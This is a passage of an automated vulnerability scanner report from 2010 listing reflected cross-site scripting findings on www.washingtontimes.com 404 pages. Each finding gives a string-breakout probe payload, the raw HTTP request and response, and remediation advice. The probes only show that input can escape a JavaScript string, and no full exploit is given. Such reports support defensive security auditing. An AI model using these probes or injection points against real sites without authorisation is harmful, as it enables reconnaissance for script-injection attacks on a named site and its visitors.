This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /customer-serviceac4f2'%3b00651201ea/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14784 Date: Mon, 13 Dec 2010 21:39:13 GMT X-Varnish: 570592631 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a77a6"%3b89bfe69d81d was submitted in the REST URL parameter 1. This input was echoed as a77a6";89bfe69d81d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feedsa77a6"%3b89bfe69d81d/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14535 Date: Mon, 13 Dec 2010 21:37:59 GMT X-Varnish: 570590790 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... cript"> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="feedsa77a6";89bfe69d81d"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 892fc'%3b44a337dbe39 was submitted in the REST URL parameter 1. This input was echoed as 892fc';44a337dbe39 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /feeds892fc'%3b44a337dbe39/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14740 Date: Mon, 13 Dec 2010 21:38:00 GMT X-Varnish: 570590847 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3edc6'%3b03c70d0c094 was submitted in the REST URL parameter 1. This input was echoed as 3edc6';03c70d0c094 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia3edc6'%3b03c70d0c094/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14759 Date: Mon, 13 Dec 2010 21:34:31 GMT X-Varnish: 570585502 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7353e"%3bd90542642a3 was submitted in the REST URL parameter 1. This input was echoed as 7353e";d90542642a3 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia7353e"%3bd90542642a3/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14789 Date: Mon, 13 Dec 2010 21:34:11 GMT X-Varnish: 570585046 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimedia7353e";d90542642a3"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94227'%3ba6892be58e4 was submitted in the REST URL parameter 1. This input was echoed as 94227';a6892be58e4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia94227'%3ba6892be58e4/collection/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14584 Date: Mon, 13 Dec 2010 21:34:02 GMT X-Varnish: 570584840 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4ee5"%3b213eb5b013a was submitted in the REST URL parameter 1. This input was echoed as f4ee5";213eb5b013a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaf4ee5"%3b213eb5b013a/collection/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14584 Date: Mon, 13 Dec 2010 21:33:51 GMT X-Varnish: 570584542 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediaf4ee5";213eb5b013a"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10bd4'%3b87381896288 was submitted in the REST URL parameter 1. This input was echoed as 10bd4';87381896288 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia10bd4'%3b87381896288/collection/30th-anniversary-john-lennons-murder/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14759 Date: Mon, 13 Dec 2010 21:36:27 GMT X-Varnish: 570588367 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f042a"%3b347460cf205 was submitted in the REST URL parameter 1. This input was echoed as f042a";347460cf205 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaf042a"%3b347460cf205/collection/30th-anniversary-john-lennons-murder/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14759 Date: Mon, 13 Dec 2010 21:36:25 GMT X-Varnish: 570588103 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediaf042a";347460cf205"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c9f3f'%3b23dbb89be6d was submitted in the REST URL parameter 1. This input was echoed as c9f3f';23dbb89be6d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediac9f3f'%3b23dbb89be6d/collection/child-hostages-freed-france/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14783 Date: Mon, 13 Dec 2010 21:36:46 GMT X-Varnish: 570588901 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39f30"%3bf3fb16fabe1 was submitted in the REST URL parameter 1. This input was echoed as 39f30";f3fb16fabe1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia39f30"%3bf3fb16fabe1/collection/child-hostages-freed-france/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14759 Date: Mon, 13 Dec 2010 21:36:45 GMT X-Varnish: 570588863 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimedia39f30";f3fb16fabe1"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f0dd6"%3b01d88764aa8 was submitted in the REST URL parameter 1. This input was echoed as f0dd6";01d88764aa8 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaf0dd6"%3b01d88764aa8/collection/fire-kills-81-chile-prison/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14759 Date: Mon, 13 Dec 2010 21:36:57 GMT X-Varnish: 570589183 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediaf0dd6";01d88764aa8"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7dca'%3ba843c824d6f was submitted in the REST URL parameter 1. This input was echoed as a7dca';a843c824d6f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaa7dca'%3ba843c824d6f/collection/fire-kills-81-chile-prison/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14789 Date: Mon, 13 Dec 2010 21:37:29 GMT X-Varnish: 570589751 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ed9d"%3b9381ad3566f was submitted in the REST URL parameter 1. This input was echoed as 4ed9d";9381ad3566f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia4ed9d"%3b9381ad3566f/collection/house-packed-explosives-burned/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14766 Date: Mon, 13 Dec 2010 21:36:29 GMT X-Varnish: 570588239 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimedia4ed9d";9381ad3566f"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4bd69'%3bbd32cc61678 was submitted in the REST URL parameter 1. This input was echoed as 4bd69';bd32cc61678 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia4bd69'%3bbd32cc61678/collection/house-packed-explosives-burned/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14584 Date: Mon, 13 Dec 2010 21:36:39 GMT X-Varnish: 570588457 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f471d"%3b23a1b9be349 was submitted in the REST URL parameter 1. This input was echoed as f471d";23a1b9be349 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaf471d"%3b23a1b9be349/collection/kosovo-election/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14598 Date: Mon, 13 Dec 2010 21:36:12 GMT X-Varnish: 570587699 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediaf471d";23a1b9be349"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload acc91'%3b642c302c34 was submitted in the REST URL parameter 1. This input was echoed as acc91';642c302c34 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediaacc91'%3b642c302c34/collection/kosovo-election/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14579 Date: Mon, 13 Dec 2010 21:36:22 GMT X-Varnish: 570588238 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2104e"%3b3b68dee159f was submitted in the REST URL parameter 1. This input was echoed as 2104e";3b68dee159f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia2104e"%3b3b68dee159f/collection/obamas-celebrate-christmas-washington/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14789 Date: Mon, 13 Dec 2010 21:35:24 GMT X-Varnish: 570586757 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimedia2104e";3b68dee159f"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cd418'%3bf7f2b7bd26 was submitted in the REST URL parameter 1. This input was echoed as cd418';f7f2b7bd26 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediacd418'%3bf7f2b7bd26/collection/obamas-celebrate-christmas-washington/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14754 Date: Mon, 13 Dec 2010 21:35:34 GMT X-Varnish: 570586978 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b087a"%3b6a043aeed85 was submitted in the REST URL parameter 1. This input was echoed as b087a";6a043aeed85 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediab087a"%3b6a043aeed85/collection/pope-inaugurates-christmas-season/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14766 Date: Mon, 13 Dec 2010 21:35:51 GMT X-Varnish: 570587376 Age: 0 Via: 1.1 varnish Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title> Error | ...[SNIP]... "> window.dctile = Number(window.dctile) + 1 || 1; if(typeof(dcopt) == "undefined"){var dcopt = ";dcopt=ist"} else {var dcopt = ""} var size="728x90,960x250,960x30,900x30,900x300"; var type="multimediab087a";6a043aeed85"; var site="wash.times"; var zone=""; var pos="top";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9c974'%3bc5298f5f6f7 was submitted in the REST URL parameter 1. This input was echoed as 9c974';c5298f5f6f7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimedia9c974'%3bc5298f5f6f7/collection/pope-inaugurates-christmas-season/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14783 Date: Mon, 13 Dec 2010 21:36:00 GMT X-Varnish: 570587624 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d9212'%3b757bae76bf4 was submitted in the REST URL parameter 1. This input was echoed as d9212';757bae76bf4 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /multimediad9212'%3b757bae76bf4/collection/redskins-fall-tampa-17-16/ HTTP/1.1 Host: www.washingtontimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 NOT FOUND Server: Apache/2.2.14 (Ubuntu) Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Content-Length: 14584 Date: Mon, 13 Dec 2010 21:35:51 GMT X-Varnish: 570587381 Age: 0 Via: 1.1 varnish Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4f2b"%3b69f3641b902 was submitted in the REST URL parameter 1. This input was echoed as b4f2b";69f3641b902 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
